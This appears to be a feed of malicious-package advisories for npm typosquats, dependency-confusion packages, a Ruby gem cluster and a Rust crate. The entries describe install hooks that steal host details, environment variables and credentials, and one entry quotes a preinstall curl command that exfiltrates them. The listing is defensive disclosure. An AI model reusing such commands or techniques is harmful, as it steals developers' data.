Malicious code in ai-sdk-helpers (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 501daa3c8b2c9c2609dc60fd90ae59710a603ae56fa5dcc867d24913889c5413 [email protected] is a typosquat impersonating the Vercel AI SDK ecosystem homepage ai-sdk.guide, author 'AI SDK Guide '. On npm install,...

Malicious code in mcp-server-redis (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c31b47d009efb7e10d0b41e71923fcfefa90a45895db0ec02bc6c8f1fee1c86 Package squats the unscoped npm name mcp-server-redis commonly invoked via npx mcp-server-redis by MCP/AI tooling looking for the official scoped Red...

MAL-2026-5482 Malicious code in mcp-server-redis (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c31b47d009efb7e10d0b41e71923fcfefa90a45895db0ec02bc6c8f1fee1c86 Package squats the unscoped npm name mcp-server-redis commonly invoked via npx mcp-server-redis by MCP/AI tooling looking for the official scoped Red...

MAL-2026-5485 Malicious code in mcp-server-supabase (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fdd7519780160ab3a92639d54eab0a62f08b3d435e61276f4ba599c638c3cd40 Package name impersonates the official scoped Supabase MCP server. package.json declares "postinstall": "node index.js", which fires automatically on...

Malicious code in loadtest-browser-lib (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 934a61b207f82f8549de09139a73a80f47746bba1dacd21f657d34e6e542324e On npm install, the package's preinstall hook executes index.js, which collects host identifiers hostname, username, platform, arch, cwd, pid,...

Malicious code in walmart-shared-modules (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e6bfb508fa412e49b249eaf5529f175ebb14f0e7d9fe19a119e8cc9acf25505a Package declares preinstall: node poc.js, which on npm install collects host identity os.hostname, whoami/id, ipconfig/ip a output, scrapes environme...

MAL-2026-4685 Malicious code in tempo-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6790e6e83af71238b9773ae49568f5374d094d23d1a7247ef4560d645ef64024 The package contains a file poc.js that imports os, https, fs, and childprocess; collects host identifiers including os.hostname, os.platform, and th...

Malicious code in intl-ads (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c7e29be11c53c137c2a24258ae423cf422fefcaad06183d67aa5c895a8fe4801 On npm install, the package's scripts.preinstall runs poc.js which collects hostname, username, full network configuration ipconfig/ip a/resolv.conf,...

Malicious code in itc-actors-api (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 22687e1f7601dde1753d3775925d62d040892631394937e56e9b9fba74fb85c6 The package contains callback.js which collects host identifiers and user information os.hostname, os.userInfo, os.platform, cwd and transmits them v...

MAL-2026-4589 Malicious code in itc-actors-api (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 22687e1f7601dde1753d3775925d62d040892631394937e56e9b9fba74fb85c6 The package contains callback.js which collects host identifiers and user information os.hostname, os.userInfo, os.platform, cwd and transmits them v...

MAL-2026-4527 Malicious code in clawpro-diagnostics-metrics-cls (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7d176cad00849132cb8df7ca53ac064e1980cea09bfe9b25836a78b4719b08ea The package's dist/index.js contains hardcoded HTTP POST calls targeting http://metadata.tencentyun.com along with reads of process.platform and...

MAL-2026-4387 Malicious code in @euqns/nudge-mcp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9b1e494fee8148b95f98e5de04cc4ecd78ed793ff2d019ae672e2b22d2debc3b The package ships dist/setup.js which performs HTTP POST requests at install time to a hardcoded external endpoint at...

Malicious code in fnd-stores (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62c9035e303ec731c71c689ed77eed17b245cd4adc475cb616ff94991539aa56 On npm install, the package's postinstall hook runs node index.js, which collects the installer's hostname, OS platform, current working directory, C...

Malicious code in @kyungseopk1m/holidays-kr (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f8538f74ec98ab5287a941ebac99e8624ba40d809edbc5b033da1150254d8215 On import/use, dist/cjs/index.js and dist/mjs/index.js call fetch against the hardcoded endpoint https://kdata.kxxseop.workers.dev with data sourced...

MAL-2026-4675 Malicious code in supership-scan (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0aebde5ba55a72b6d4c6917ccf22db1427d434fed04cecc22dd16844e2d39033 The package advertises itself as a local-only static analyzer README: "Runs locally. Your code never leaves the machine" and "What's never transmitte...

Malicious code in @aswinsparky/api (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cceefd98563e2885501c896472471f2bb20b77103ad99c253775570cae6b4fe index.js line 11 issues a fetch to the hardcoded URL https://api.aswinsparky.qzz.io carrying values read from process.env. The destination is a...

MAL-2026-4605 Malicious code in mamadoos-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4 package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...

MAL-2026-4506 Malicious code in cb-wallet-data (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9d076ee3d487c7c10f785494c4391e39eb327b696224d5653746144fa5ac8d37 Package name 'cb-wallet-data' targets a presumed Coinbase-internal namespace and is published by an unaffiliated party. Both postinstall.js npm insta...

Malicious Package

Overview knot-devise-jwt-helper is a malicious package. This package is part of a malicious cluster of Ruby gems published by the threat actor knot-theory. Designed to impersonate legitimate utilities, it executes a payload upon installation that harvests environment variables, SSH keys, AWS...

RUSTSEC-2026-0084 `logprinter` was removed from crates.io for malicious code

The crate downloaded code from an external HTTP endpoint and executed it within its trace fn...